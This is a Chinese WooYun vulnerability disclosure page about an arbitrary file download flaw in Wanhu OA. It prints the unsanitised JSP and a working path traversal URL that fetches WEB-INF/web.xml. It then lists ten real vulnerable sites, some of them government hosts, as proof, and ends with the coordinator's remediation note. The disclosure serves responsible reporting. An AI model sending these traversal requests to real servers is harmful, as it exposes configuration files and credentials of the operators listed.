当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0105462

漏洞标题:万户oa任意文件下载

相关厂商:万户

漏洞作者: 路人甲

提交时间:2015-04-03 11:22

修复时间:2015-07-07 08:22

公开时间:2015-07-07 08:22

漏洞类型:任意文件遍历/下载

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-03: 细节已通知厂商并且等待厂商处理中
2015-04-08: 厂商已经确认,细节仅向厂商公开
2015-04-11: 细节向第三方安全合作伙伴开放
2015-06-02: 细节向核心白帽子及相关领域专家公开
2015-06-12: 细节向普通白帽子公开
2015-06-22: 细节向实习白帽子公开
2015-07-07: 细节向公众公开

简要描述:

万户oa任意文件下载,搜了下乌云没发现重复,所以提交。

详细说明:

缺陷文件:defaultroot/download_ftp.jsp
<%@ page contentType="text/html; charset=GBK" %>
<% 
String path = "https://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/" + request.getParameter("path");
String name = request.getParameter("name");
String FileName = request.getParameter("FileName");
java.io.File file = new java.io.File(application.getRealPath("/") + path + "/" + FileName);
//构造拼接即可,比如 /../WEB-INF/web.xml
if(!file.exists()) {
  %>
  <script language="javascript">
    alert("指定的文件不存在!");
    window.close();
  </script>
  <%
  return;
}
 
response.setContentType("application/x-download"); 
response.addHeader("Content-Disposition", "attachment;filename=" + java.net.URLEncoder.encode(name, "UTF-8"));
try {
  out.clear(); 
  out = pageContext.pushBody(); 
} catch(Throwable e) {
  e.printStackTrace(); 
} 
try {
  RequestDispatcher dis = application.getRequestDispatcher(path + "/" + FileName);
  dis.forward(request,response); 
} catch(Throwable e) {
  e.printStackTrace(); 
} finally {
  response.flushBuffer();
}   
%>


利用方式:
http://oa.zjcof.com.cn/defaultroot/download_ftp.jsp?path=/../WEB-INF/&name=aaa&FileName=web.xml
即可下载web.xml

QQ20150327-1@2x.png


漏洞证明:

附上10个案例证明:
1. http://www.ahjinzhai.gov.cn:7001/defaultroot/download_ftp.jsp?path=/../WEB-INF/&name=aaa&FileName=web.xml
2. http://www.tlcz.gov.cn:7001//defaultroot/download_ftp.jsp?path=/../WEB-INF/&name=aaa&FileName=web.xml
3. http://oa.zjcof.com.cn/defaultroot/download_ftp.jsp?path=/../WEB-INF/&name=aaa&FileName=web.xml
4. http://myoho.net:7001/defaultroot/download_ftp.jsp?path=/../WEB-INF/&name=aaa&FileName=web.xml
5. http://runbongroup.vicp.net:7001//defaultroot/download_ftp.jsp?path=/../WEB-INF/&name=aaa&FileName=web.xml
6. http://www.xhoa.net/defaultroot/download_ftp.jsp?path=/../WEB-INF/&name=aaa&FileName=web.xml
7. http://ahoa.cn/defaultroot/download_ftp.jsp?path=/../WEB-INF/&name=aaa&FileName=web.xml
8. http://218.22.105.142:7001//defaultroot/download_ftp.jsp?path=/../WEB-INF/&name=aaa&FileName=web.xml
9. http://oa.chinafoma.com//defaultroot/download_ftp.jsp?path=/../WEB-INF/&name=aaa&FileName=web.xml
10.http://oa.gdhualu.com//defaultroot/download_ftp.jsp?path=/../WEB-INF/&name=aaa&FileName=web.xml
若需要更多测试案例,可私信联系。

修复方案:

.

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-04-08 08:21

厂商回复:

CNVD确认并复现所述情况,已经由CNVD根据以往联系渠道向软件生产厂商通报,同时根据实测案例,已经转由CNCERT下发给安徽、浙江分中心,由其后续协调涉及的政府网站管理单位处置。

最新状态:

暂无

漏洞评价:

评论